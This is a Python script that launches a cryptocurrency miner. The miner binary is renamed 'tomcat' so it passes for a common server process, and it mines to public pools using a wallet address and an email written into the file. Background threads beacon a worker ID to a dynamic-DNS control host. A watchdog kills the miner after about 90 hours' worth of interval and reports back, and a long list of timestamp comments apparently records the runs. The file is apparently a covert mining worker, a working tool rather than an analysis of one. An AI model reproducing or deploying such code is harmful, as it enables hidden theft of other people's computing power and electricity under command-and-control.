import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:01.754084
#2018-02-17 15:54:05.852918
#2018-02-17 17:41:07.349714
#2018-02-17 19:28:02.064043
#2018-02-17 21:17:05.827103
#2018-02-17 23:01:05.231657
#2018-02-18 00:48:07.232734
#2018-02-18 02:37:05.390490
#2018-02-18 04:26:03.763050
#2018-02-18 06:17:04.627077
#2018-02-18 08:06:07.771992
#2018-02-18 09:53:04.928678
#2018-02-18 11:40:08.070546
#2018-02-18 13:25:08.408005
#2018-02-18 15:15:07.879643
#2018-02-18 17:04:04.181226
#2018-02-18 18:50:05.106418
#2018-02-18 20:37:06.523903
#2018-02-18 22:23:01.640539
#2018-02-19 00:13:01.281849
#2018-02-19 01:59:06.535714
#2018-02-19 03:46:01.851235
#2018-02-19 05:29:06.166783
#2018-02-19 07:18:04.215130
#2018-02-19 09:07:06.229035
#2018-02-19 10:57:08.562426
#2018-02-19 12:44:11.265804
#2018-02-19 14:33:08.133818
#2018-02-19 16:21:07.128162
#2018-02-19 18:09:08.112389
#2018-02-19 19:57:03.885210
#2018-02-19 21:44:08.223270
#2018-02-19 23:32:01.742430
#2018-02-20 01:18:06.130320
#2018-02-20 03:09:01.304122
#2018-02-20 04:55:08.406287
#2018-02-20 06:38:05.211394
#2018-02-20 08:23:05.517868
#2018-02-20 10:09:01.286195
#2018-02-20 11:53:06.562997
#2018-02-20 13:40:11.262938
#2018-02-20 15:25:09.237469
#2018-02-20 17:12:10.761388
#2018-02-20 19:02:05.926306
#2018-02-20 20:52:07.966915
#2018-02-20 22:36:07.317558
#2018-02-21 00:17:01.356322
#2018-02-21 02:05:05.546516
#2018-02-21 03:52:06.821576
#2018-02-21 05:42:01.296261
#2018-02-21 07:30:09.910529
#2018-02-21 09:15:05.224961
#2018-02-21 11:03:07.845115
#2018-02-21 12:49:04.463713
#2018-02-21 14:37:05.233115
#2018-02-21 16:25:10.654456
#2018-02-21 18:15:12.462657
#2018-02-21 20:01:10.823698
#2018-02-21 21:47:08.247399
#2018-02-21 23:34:03.608840
#2018-02-22 01:22:08.375770
#2018-02-22 03:10:05.667180
#2018-02-22 04:54:06.634574
#2018-02-22 06:40:04.121435
#2018-02-22 08:28:03.778856
#2018-02-22 10:15:06.033725
#2018-02-22 12:00:11.303436
#2018-02-22 13:47:06.312656
#2018-02-22 15:35:01.848207
#2018-02-22 17:21:06.128564
#2018-02-22 19:09:06.080630
#2018-02-22 21:02:06.744268
#2018-02-22 22:47:07.862202
#2018-02-23 00:35:08.406556
#2018-02-23 02:22:02.152074
#2018-02-23 04:12:06.568775
#2018-02-23 05:58:03.720965
#2018-02-23 07:32:06.937669
#2018-02-23 09:36:06.132943
#2018-02-23 11:17:01.932894
#2018-02-23 12:37:05.162677
#2018-02-23 14:05:05.930132
#2018-02-23 15:42:04.147492
#2018-02-23 17:13:01.904684
#2018-02-23 19:04:06.709194
#2018-02-23 20:39:02.056493
#2018-02-23 22:14:08.102570
#2018-02-23 23:47:07.318260
#2018-02-24 01:21:06.251685
#2018-02-24 02:58:06.316570
#2018-02-24 04:35:03.995731
#2018-02-24 06:03:04.015110
#2018-02-24 07:38:01.670106
#2018-02-24 09:12:06.318235
#2018-02-24 10:37:01.484761
#2018-02-24 12:23:03.882261
#2018-02-24 14:17:04.709647
#2018-02-24 16:03:04.221956
#2018-02-24 17:55:06.582138
#2018-02-24 19:42:08.402501
#2018-02-24 21:29:06.315652
#2018-02-25 02:03:07.627223
#2018-02-25 06:03:05.255299
#2018-02-25 11:39:04.194570